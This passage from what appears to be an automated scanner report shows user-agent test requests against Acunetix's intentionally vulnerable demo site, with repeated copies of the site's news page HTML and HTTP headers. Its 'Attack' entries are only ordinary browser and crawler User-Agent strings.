</script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Show / hide Request and Response
Request Header - size: 211 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0 Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=00fx0k45xmjds355o2anay45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Show / hide Request and Response
Request Header - size: 205 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=hkadbb55hbeps455mmw5ao55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" 